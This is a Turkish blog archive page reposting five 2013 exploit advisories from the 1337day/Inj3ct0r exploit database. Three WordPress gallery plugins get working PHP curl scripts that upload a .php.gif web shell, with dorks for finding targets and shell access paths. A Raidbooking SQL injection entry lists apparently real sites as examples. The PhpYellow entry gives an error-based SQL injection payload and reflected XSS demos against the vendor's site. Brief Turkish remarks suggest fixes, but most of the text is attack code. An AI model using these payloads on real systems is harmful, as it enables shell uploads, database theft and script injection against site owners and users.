Archive for 30 Ocak 2013

WordPress plugins powerzoomer Arbitrary File Upload Vulnerability

WordPress plugins powerzoomer Arbitrary File Upload Açığı bulunmuş olup diğer iki açığı bulan aynı kişi olup, bu açıktada eklenti güncellenmeli veya kod çalıştırmayı önleyeci .htaccess oluşturulmalı onuda yapamıyorsanız resim uploadını ftp den yapmalı chmod ayarlarını 755 yapmalısınız.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins - powerzoomer Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/power-zoomer/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://downloads.wordpress.org/plugin/power-zoomer.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
 
 
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/power-zoomer/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/powerzoomer/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/powerzoomer/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------

WordPress plugins wp-powerplaygallery Arbitrary File Upload Vulnerability

WordPress plugins wp-powerplaygallery Arbitrary File Upload Açığı ile bir önceki yazımımda belirttiğim üzere, eklenti yeni sürümüyle güncellenmeli veya upload dizininde php çalışmasını önleyecek .htaccess oluşturularak bu tür uzantılar engellenmelidir.

Açık hakkında açıklamalar.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins - wp-powerplaygallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/wp-powerplaygallery/"
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://downloads.wordpress.org/plugin/wp-powerplaygallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
 
 
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-powerplaygallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/power_play/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/power_play/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------

WordPress plugins wp-explorer-gallery Arbitrary File Upload Vulnerability

WordPress plugins wp-explorer-gallery Arbitrary File Upload upload açığı bulunmuş olup, php.gif uzantılı olarak upload edilmekte, servere ulaşılarık çeşitli exploitler, scriptler, zararlı yazılımlar çalıştırma imkanı vermektedir.
Tüm wordpress upload açıklarında olduğu gibi bu açıktada, eklentinin yeni sürümü wordpress sitesinden indirilerek güncellemeli veya .htaccess kodu oluşturularık php ve php.gif gibi uzantılar engellenmelidir.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins  -  wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-';     // Characters allowed in the file name (in a Regular Expression format)
------------------
 
-----------
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads//'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------

Raidbooking v.1.1 Sql Injection Vulnerability

Raidbooking v.1.1 Sql Injection Açığı bulunmuş oluş sql injectionun açıklarıyla neler yapılabileceğini anlatmıştım.
Açık oluşum yeri ve açık hakkındaki exploit.

[+]~P0c : 
localhost/raid.php?id=1
 
[+]~Examples:
http://mossraid.wz.cz//raid.php?id=1%27
http://wow.boule.cz/raids/raid.php?id=1%27
http://www.fredzy.fr/WOW/raid_CP/raid.php?id=1%27%22
 
(---|~DzMafia~|---)
We Are : PassWord | BackUp | Gel-dz | EliteTrojan | Lakamora | JIGsaw | Evil-Dz
 
fb.me/AlgerianMafia
fb.me/elitetrojan
 
# 01EF407405E52197   1337day.com [2013-01-27]   C1B5F30A00438C37 #

PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities

PhpYellow Pro Edition XSS/SQL Injection Açıkları bulundu.
Açıkla MYSQL veri tabanını bağlanılarak bilgiler alınabilmekte, XSS açıklarıyla zararlı kodlar çalıştırabilmekte.
Açık Exploit

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
 
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
 
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
 
# BECC55EC920E93FC   1337day.com [2013-01-27]   214750033779CE53 #